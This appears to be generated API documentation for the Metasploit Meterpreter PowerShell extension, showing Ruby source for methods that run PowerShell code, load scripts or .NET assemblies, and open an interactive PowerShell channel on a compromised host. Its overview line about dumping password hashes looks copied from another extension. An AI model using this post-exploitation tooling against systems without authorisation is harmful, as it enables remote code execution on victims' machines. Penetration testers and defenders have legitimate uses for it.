Class: Rex::Post::Meterpreter::Extensions::Powershell::Powershell

Inherits:
Rex::Post::Meterpreter::Extension show all
Defined in:
lib/rex/post/meterpreter/extensions/powershell/powershell.rb

Overview

This meterpreter extensions a privilege escalation interface that is capable of doing things like dumping password hashes and performing local exploitation.

Instance Attribute Summary

Attributes inherited from Rex::Post::Meterpreter::Extension

#client, #name

Class Method Summary collapse

Instance Method Summary collapse

Constructor Details

#initialize(client) ⇒ Powershell

Returns a new instance of Powershell.



25
26
27
28
29
30
31
32
33
34
35
 
# File 'lib/rex/post/meterpreter/extensions/powershell/powershell.rb', line 25

def initialize(client)
  super(client, 'powershell')

  client.register_extension_aliases(
    [
      {
        'name' => 'powershell',
        'ext'  => self
      },
    ])
end

Class Method Details

.extension_idObject 



21
22
23
 
# File 'lib/rex/post/meterpreter/extensions/powershell/powershell.rb', line 21

def self.extension_id
  EXTENSION_ID_POWERSHELL
end

Instance Method Details

#execute_string(opts = {}) ⇒ Object 



70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
 
# File 'lib/rex/post/meterpreter/extensions/powershell/powershell.rb', line 70

def execute_string(opts={})
  return nil unless opts[:code]

  request = Packet.create_request(COMMAND_ID_POWERSHELL_EXECUTE)
  request.add_tlv(TLV_TYPE_POWERSHELL_CODE, opts[:code])
  request.add_tlv(TLV_TYPE_POWERSHELL_SESSIONID, opts[:session_id]) if opts[:session_id]

  response = client.send_request(request)
  result = {}
  handle = client.sys.config.get_token_handle()
  if handle != 0
    result[:warning] = 'Impersonation will not apply to PowerShell.'
  end

  result[:output] = response.get_tlv_value(TLV_TYPE_POWERSHELL_RESULT)
  return result
end

#import_file(opts = {}) ⇒ Object 



38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
 
# File 'lib/rex/post/meterpreter/extensions/powershell/powershell.rb', line 38

def import_file(opts={})
  return nil unless opts[:file]

  # if it's a script, then we'll just use execute_string
  if opts[:file].end_with?('.ps1')
    opts[:code] = ::File.read(opts[:file])
    return execute_string(opts)
  end

  # if it's a dll (hopefully a .NET 2.0 one) then do something different
  if opts[:file].end_with?('.dll')
    # TODO: perhaps do some kind of check to see if the DLL is a .NET assembly?
    binary = ::File.read(opts[:file])

    request = Packet.create_request(COMMAND_ID_POWERSHELL_ASSEMBLY_LOAD)
    request.add_tlv(TLV_TYPE_POWERSHELL_ASSEMBLY_SIZE, binary.length)
    request.add_tlv(TLV_TYPE_POWERSHELL_ASSEMBLY, binary)
    client.send_request(request)
    return { loaded: true }
  end

  return { loaded: false }
end

#session_remove(opts = {}) ⇒ Object 



62
63
64
65
66
67
68
 
# File 'lib/rex/post/meterpreter/extensions/powershell/powershell.rb', line 62

def session_remove(opts={})
  return false unless opts[:session_id]
  request = Packet.create_request(COMMAND_ID_POWERSHELL_SESSION_REMOVE)
  request.add_tlv(TLV_TYPE_POWERSHELL_SESSIONID, opts[:session_id]) if opts[:session_id]
  client.send_request(request)
  return true
end

#shell(opts = {}) ⇒ Object 



88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
 
# File 'lib/rex/post/meterpreter/extensions/powershell/powershell.rb', line 88

def shell(opts={})
  request = Packet.create_request(COMMAND_ID_POWERSHELL_SHELL)
  request.add_tlv(TLV_TYPE_POWERSHELL_SESSIONID, opts[:session_id]) if opts[:session_id]

  response = client.send_request(request)
  channel_id = response.get_tlv_value(TLV_TYPE_CHANNEL_ID)
  if channel_id.nil?
    raise Exception, "We did not get a channel back!"
  end

  result = {}
  handle = client.sys.config.get_token_handle()
  if handle != 0
    result[:warning] = 'Impersonation will not apply to PowerShell.'
  end

  result[:channel] = Rex::Post::Meterpreter::Channels::Pools::StreamPool.new(client, channel_id, 'powershell_psh', CHANNEL_FLAG_SYNCHRONOUS, response)

  result
end